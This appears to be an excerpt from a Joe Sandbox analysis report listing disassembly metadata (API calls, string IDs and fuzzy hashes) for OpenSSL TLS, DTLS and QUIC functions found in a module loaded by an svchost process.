                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$L_sk_freeL_sk_num$L_sk_valueO_free$L_sk_dup$O_memcmpmemcmpmemcpy
                                                                                              • String ID: P$ssl\statem\statem_srvr.c$tls_early_post_process_client_hello
                                                                                              • API String ID: 642479057-77815245
                                                                                              • Opcode ID: c447f6e93f942091da1cfdd80307a043e06866bcd382f3df36c028cff0107e0e
                                                                                              • Instruction ID: 4fb428abde8c3e44dcbb5f3be11bdb9bcbee855efc1bdc1159571044b84d4b67
                                                                                              • Opcode Fuzzy Hash: c447f6e93f942091da1cfdd80307a043e06866bcd382f3df36c028cff0107e0e
                                                                                              • Instruction Fuzzy Hash: 48727AB1A0A78686EB629B31D4D52BD23A1FB44B48F14C432DE6D876B6DE3DE845C301
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: M_locate_constR_new$M_get_intM_get_uintO_freeO_strdup$O_mallocO_reallocR_pop_to_markR_set_debugR_set_errorR_set_markT_freememset
                                                                                              • String ID: add_provider_groups$ssl\t1_lib.c$tls-group-alg$tls-group-id$tls-group-is-kem$tls-group-name$tls-group-name-internal$tls-group-sec-bits$tls-max-dtls$tls-max-tls$tls-min-dtls$tls-min-tls
                                                                                              • API String ID: 1973439691-538443449
                                                                                              • Opcode ID: 1a615cb7a5e931d0d5ccc9f0736496d10e9277377a0fbad70ecfd51b3f16c65c
                                                                                              • Instruction ID: c4b21673c2bd0ae669c9c2a8fb7a315c8cd7de82e2ef49e6a491589bcc41fe97
                                                                                              • Opcode Fuzzy Hash: 1a615cb7a5e931d0d5ccc9f0736496d10e9277377a0fbad70ecfd51b3f16c65c
                                                                                              • Instruction Fuzzy Hash: 9DB1AEA6A0B61381FE66EB36D4811BC67A1AF84780F48C435DD2D46BFAEE2CF545C311
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugX509_free$L_sk_new_nullR_vset_error
                                                                                              • String ID: ssl\statem\statem_srvr.c$tls_process_client_certificate
                                                                                              • API String ID: 3750526228-3872095317
                                                                                              • Opcode ID: 2245cf865578e7a48e5514ed147dcc870c3e1326ddd966a616d1f47169671059
                                                                                              • Instruction ID: ce15aadebadb48cb442a423b9514c074bc6e13b97851f999dbccac4f2376d840
                                                                                              • Opcode Fuzzy Hash: 2245cf865578e7a48e5514ed147dcc870c3e1326ddd966a616d1f47169671059
                                                                                              • Instruction Fuzzy Hash: 3122C1A1A0AA8285F722DB75D4D12BC27A0EF44B88F54C035DE6D876BADF3CE595C301
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Digest$Init_exL_cleanseR_newR_set_debug$D_get_sizeFinal_exR_vset_errorX_freeX_newY_free
                                                                                              • String ID: HMAC$ext binder$res binder$ssl\statem\extensions.c$tls_psk_do_binder
                                                                                              • API String ID: 1391125327-4250429628
                                                                                              • Opcode ID: aa648eda198148f241356230853b77f506c39ac3c91fd7dc30166a0f7459d8b7
                                                                                              • Instruction ID: fdace0ce5fbf1bc1cc988bb80e38864aeaac9c2eeb586ec9ab6d704808527702
                                                                                              • Opcode Fuzzy Hash: aa648eda198148f241356230853b77f506c39ac3c91fd7dc30166a0f7459d8b7
                                                                                              • Instruction Fuzzy Hash: 5CF191B2A1EB8281E766DB32D8557BE6351FB84784F408032DE6D47AA6DF3CD194C700
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB432380
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB432398
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB4323A6
                                                                                              • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB4323C3
                                                                                              • OPENSSL_sk_value.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB4323D5
                                                                                              • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB432401
                                                                                              • X509_get_pubkey.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB432418
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB432451
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB432469
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB43247A
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB432484
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB43249C
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB4324AB
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB432742
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error$L_sk_num$L_sk_valueX509_get_pubkeyY_free
                                                                                              • String ID: ssl\ssl_rsa.c$ssl_set_cert_and_key
                                                                                              • API String ID: 5495268-424671516
                                                                                              • Opcode ID: a1d7ba00e69706b45c3bd3fe9396481b6ccd245627e164c97f20f1ca8c06df68
                                                                                              • Instruction ID: ad42026b311d22a17fd9cc109398995f22d1c65590f574a38cba4d4730b248ce
                                                                                              • Opcode Fuzzy Hash: a1d7ba00e69706b45c3bd3fe9396481b6ccd245627e164c97f20f1ca8c06df68
                                                                                              • Instruction Fuzzy Hash: 93C141B2A4AA5281FA62AB32D4926FE2350FF44B84F54C031DD7D477B6DE3CE54A8701
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_mallocX_freeX_new
                                                                                              • String ID: AES-256-CBC$SHA256$construct_stateless_ticket$ssl\statem\statem_srvr.c
                                                                                              • API String ID: 1847107836-3117162005
                                                                                              • Opcode ID: b75908480853a0a3d47656859823882674881c45ef64c2ec60f94bd00c315812
                                                                                              • Instruction ID: bab8eeee8ac06c8036a965dafa07f0968830a44ebc42d7ffdd7dbf8dc52d6292
                                                                                              • Opcode Fuzzy Hash: b75908480853a0a3d47656859823882674881c45ef64c2ec60f94bd00c315812
                                                                                              • Instruction Fuzzy Hash: 2F026FA2B0E64385FB62DB72D4912BD23A1AF44784F40C432EE6D47AB6DF3DE5458341
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(00000000,?,00007FFBAB426D26,?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB41CB92
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(00000000,?,00007FFBAB426D26,?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB41CBBC
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(00000000,?,00007FFBAB426D26,?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB41CBDB
                                                                                              • EVP_PKEY_up_ref.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CC37
                                                                                              • X509_up_ref.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CC89
                                                                                              • EVP_PKEY_up_ref.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CC9F
                                                                                              • X509_chain_up_ref.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CCAD
                                                                                              • CRYPTO_memdup.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CCD9
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CD22
                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CD3E
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CD50
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CD68
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CD79
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CD98
                                                                                              • X509_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CDBA
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CDC6
                                                                                              • OSSL_STACK_OF_X509_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CDD3
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CDED
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CE18
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CE2E
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CE44
                                                                                              • X509_STORE_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CE4D
                                                                                              • X509_STORE_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CE56
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CE7B
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CE91
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CEA6
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CEEB
                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CF0B
                                                                                              • CRYPTO_memdup.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CF38
                                                                                              • X509_STORE_up_ref.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CF71
                                                                                              • X509_STORE_up_ref.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CF87
                                                                                              • CRYPTO_strdup.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CFF0
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: O_free$X509_$E_freeE_up_refO_mallocO_memdupO_zallocX509_freeY_freeY_up_refmemcpy$O_strdupR_newR_set_debugR_set_errorX509_chain_up_refX509_up_ref
                                                                                              • String ID: gfffffff$ssl\ssl_cert.c$ssl_cert_dup
                                                                                              • API String ID: 2506476208-2918673968
                                                                                              • Opcode ID: b2383af6243f51b575e5486e437ad1ab2c1274e53547ce8655614b89afad1b05
                                                                                              • Instruction ID: 471517dbd5c10ff0451a1cd970b1a8ab60496741febf8ac99faae7e24afcfb85
                                                                                              • Opcode Fuzzy Hash: b2383af6243f51b575e5486e437ad1ab2c1274e53547ce8655614b89afad1b05
                                                                                              • Instruction Fuzzy Hash: 06D140B2B0AB5296EB66DF36E5912AC33A4FB44B84F008136CE5D47765DF38E4A4C341
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freememcpy$O_zallocR_vset_error
                                                                                              • String ID: ssl\statem\statem_srvr.c$tls_process_client_hello
                                                                                              • API String ID: 1337932799-2971398671
                                                                                              • Opcode ID: e02510164f2f826f8398bc0feb2822620d60f91c3c343bdc9e891f5f2849989e
                                                                                              • Instruction ID: 45b4d082d90057504339f08af6f4b221098bbf9e57e97281b861d07e58e7220d
                                                                                              • Opcode Fuzzy Hash: e02510164f2f826f8398bc0feb2822620d60f91c3c343bdc9e891f5f2849989e
                                                                                              • Instruction Fuzzy Hash: 2B02A2A2A1EA8281EB26DB35D4D12BD6761EB45784F00C131DEBE476F6DE3DE5A4C300
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$O_freeX_freeX_new
                                                                                              • String ID: ssl\statem\statem_lib.c$tls_construct_cert_verify
                                                                                              • API String ID: 3285935519-1615455696
                                                                                              • Opcode ID: 47e8e463115130e5e1af129de5510440e8e6f5e6c7a007c25118c6b62e52d0d8
                                                                                              • Instruction ID: 45aa4c198488a6858d3d9aba5ca476b2663c5dc518fa6669ee02ee2dcf8a1dbd
                                                                                              • Opcode Fuzzy Hash: 47e8e463115130e5e1af129de5510440e8e6f5e6c7a007c25118c6b62e52d0d8
                                                                                              • Instruction Fuzzy Hash: B9A174E1A0E64281FA32D776D8812BE5391EF85B90F14C432EE6D87BF6DE2CE5058741
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB49DDC8), ref: 00007FFBAB49C8D7
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB49DDC8), ref: 00007FFBAB49C8EF
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB49DDC8), ref: 00007FFBAB49C98A
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB49DDC8), ref: 00007FFBAB49C9A2
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: 0$ssl\statem\statem_srvr.c$tls-client-version$tls-negotiated-version$tls_process_cke_rsa
                                                                                              • API String ID: 4275876640-318422981
                                                                                              • Opcode ID: e82aa647c1e71e8cc646951466d0efac38892dce83f138ac50626a02bed19007
                                                                                              • Instruction ID: 46a5b721f58f4c174ae21a51fb70e7dc71e6c3e4fc53744b12b01a03fe905e31
                                                                                              • Opcode Fuzzy Hash: e82aa647c1e71e8cc646951466d0efac38892dce83f138ac50626a02bed19007
                                                                                              • Instruction Fuzzy Hash: 0FA18EA2A1EA8281E722DB35E4916FD6360FB89784F40C131DEAD576A7DF3CE585C700
                                                                                              APIs
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE,?,00007FFBAB450F14), ref: 00007FFBAB4484C8
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE,?,00007FFBAB450F14), ref: 00007FFBAB448503
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE,?,00007FFBAB450F14), ref: 00007FFBAB4485B8
                                                                                              • GetCurrentProcessId.KERNEL32(02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE,?,00007FFBAB450F14), ref: 00007FFBAB4485F8
                                                                                              • OpenSSL_version.LIBCRYPTO-3-X64(?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE,?,00007FFBAB450F14), ref: 00007FFBAB448655
                                                                                              • BIO_snprintf.LIBCRYPTO-3-X64(?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE,?,00007FFBAB450F14), ref: 00007FFBAB448673
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: O_free$CurrentL_versionO_snprintfOpenProcess
                                                                                              • String ID: 0.3$JSON-SEQ$OpenSSL/%s (%s)$QUIC$client$common_fields$delta$description$group_id$name$process_id$protocol_type$qlog_format$qlog_version$server$ssl\quic\qlog.c$system_info$time_format$title$trace$type$vantage_point
                                                                                              • API String ID: 2463599471-1827591402
                                                                                              • Opcode ID: c519cb3baef21b79d41f78c8beec8676423318cf7b238a91da5a5e575d69bddf
                                                                                              • Instruction ID: b503104ded044e40e96be0cd2157119df4b1ecef55e65afb3caf843b29a9cce8
                                                                                              • Opcode Fuzzy Hash: c519cb3baef21b79d41f78c8beec8676423318cf7b238a91da5a5e575d69bddf
                                                                                              • Instruction Fuzzy Hash: 6C81EBF1A0E64242F96AEB35D6A22BD6362AF457C0F409031DE6E067B6DF7CE0158351
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00000001,?,00007FFBAB472C46), ref: 00007FFBAB472FFC
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00000001,?,00007FFBAB472C46), ref: 00007FFBAB473014
                                                                                                • Part of subcall function 00007FFBAB477530: ERR_vset_error.LIBCRYPTO-3-X64(?,?,00007FFBAB473310,?,00007FFBAB472C46), ref: 00007FFBAB47755E
                                                                                              • EVP_CIPHER_CTX_get0_cipher.LIBCRYPTO-3-X64(?,?,?,00000001,?,00007FFBAB472C46), ref: 00007FFBAB473048
                                                                                              • EVP_MD_get_size.LIBCRYPTO-3-X64(?,?,?,00000001,?,00007FFBAB472C46), ref: 00007FFBAB473055
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00000001,?,00007FFBAB472C46), ref: 00007FFBAB47305F
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00000001,?,00007FFBAB472C46), ref: 00007FFBAB473077
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$D_get_sizeR_vset_errorX_get0_cipher
                                                                                              • String ID: dtls_process_record$ssl\record\methods\dtls_meth.c
                                                                                              • API String ID: 755951681-2805733615
                                                                                              • Opcode ID: f7ebccd8a760c3d19fd7fbeb7e7855712576345588e8f1dc3867c87ee5accb7b
                                                                                              • Instruction ID: 5fbc2c33dac5082b519394046e535596cf08a562be12c67fdec3f3cc0f11561e
                                                                                              • Opcode Fuzzy Hash: f7ebccd8a760c3d19fd7fbeb7e7855712576345588e8f1dc3867c87ee5accb7b
                                                                                              • Instruction Fuzzy Hash: 6AB170B2A1A68292FB62DB31E4816FD2364FF44B84F408432DE6D57AB5DE38E595C301
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_clear_free$L_cleanse$O_freeR_vset_errorY_freeY_get1_encoded_public_key
                                                                                              • String ID: ssl\statem\statem_clnt.c$tls_construct_cke_ecdhe$tls_construct_cke_srp$tls_construct_client_key_exchange
                                                                                              • API String ID: 309064216-3169014888
                                                                                              • Opcode ID: 40d04c4f977c2e1087b9e7e159e1df514b1a354b1f57408a19e495b6994f3112
                                                                                              • Instruction ID: dbd3a98a4eeaa0f47922bcc9584fab9ba2f7848e0bed5aee6d95c19f15a5c548
                                                                                              • Opcode Fuzzy Hash: 40d04c4f977c2e1087b9e7e159e1df514b1a354b1f57408a19e495b6994f3112
                                                                                              • Instruction Fuzzy Hash: 709181A2A4E68281FA62ABB6E4417F92351EF80BC4F04C032DE6D477B7CE3DE5458351
                                                                                              Similarity
                                                                                              • API ID: O_free$L_sk_free$L_sk_numL_sk_pushO_mallocstrncmp$L_sk_deleteL_sk_dupL_sk_new_nullL_sk_set_cmp_funcL_sk_sortL_sk_valueR_newR_set_debugR_set_error
                                                                                              • String ID: ALL:!COMPLEMENTOFDEFAULT:!eNULL$DEFAULT$NTOFDEFAULT$ssl\ssl_ciph.c
                                                                                              • API String ID: 3571880206-2581353747
                                                                                              • Opcode ID: 1405fa062426b2b81a248fb0295fe92e2fc98ede5a851c11c0418ba1936b4835
                                                                                              • Instruction ID: ea464582a642c6d3e99fe25b203e698eb6afede35ef4e793f969cca06be34102
                                                                                              • Opcode Fuzzy Hash: 1405fa062426b2b81a248fb0295fe92e2fc98ede5a851c11c0418ba1936b4835
                                                                                              • Instruction Fuzzy Hash: A5727AA2A0AB4581EE6ACF69D0406797BE0FB54B84F64C035DE6D477A0EF3DE981D340
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426AE2
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426AFA
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426B0C
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426B29
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426B41
                                                                                              • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426D6B
                                                                                              • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426D7F
                                                                                              • OPENSSL_sk_new_reserve.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426DB7
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426DC8
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426DE0
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426DF1
                                                                                              • OPENSSL_sk_value.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426E19
                                                                                              • OSSL_PARAM_construct_int.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426F6D
                                                                                              • OSSL_PARAM_construct_end.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB426F96
                                                                                              • X509_VERIFY_PARAM_get_depth.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB42707D
                                                                                              • X509_VERIFY_PARAM_set_depth.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB4270C7
                                                                                              • CRYPTO_dup_ex_data.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB427124
                                                                                              • X509_VERIFY_PARAM_inherit.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB427192
                                                                                              • OPENSSL_sk_dup.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB4271A3
                                                                                              • OPENSSL_sk_dup.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB4271C4
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugX509_$L_sk_dupL_sk_numR_set_error$L_sk_new_reserveL_sk_valueM_construct_endM_construct_intM_get_depthM_inheritM_set_depthO_dup_ex_data
                                                                                              • String ID: SSL_new$read_ahead$ssl\ssl_lib.c$ssl_dane_dup
                                                                                              • API String ID: 2291486214-3332040259
                                                                                              • Opcode ID: 9278c32fdcb4760945533fc4528d50aab5ecc26abcec242680b99fced4bff74e
                                                                                              • Instruction ID: c0c6b5bf84e73a37d2b761e24fdc375c35dc96b9d2e6a37d6027c5f04aefb605
                                                                                              • Opcode Fuzzy Hash: 9278c32fdcb4760945533fc4528d50aab5ecc26abcec242680b99fced4bff74e
                                                                                              • Instruction Fuzzy Hash: E6225CB2A0A68285FB669F36D4907B933A4FF54B84F048435CE6D477A6DF39E844D700
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB496261
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB496279
                                                                                              • CRYPTO_memcmp.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB49629B
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB4962A4
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB4962B4
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB4962C0
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB496368
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB496380
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB496390
                                                                                              • d2i_PUBKEY_ex.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB4963D8
                                                                                              • EVP_PKEY_missing_parameters.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB4963FB
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB496404
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB49641C
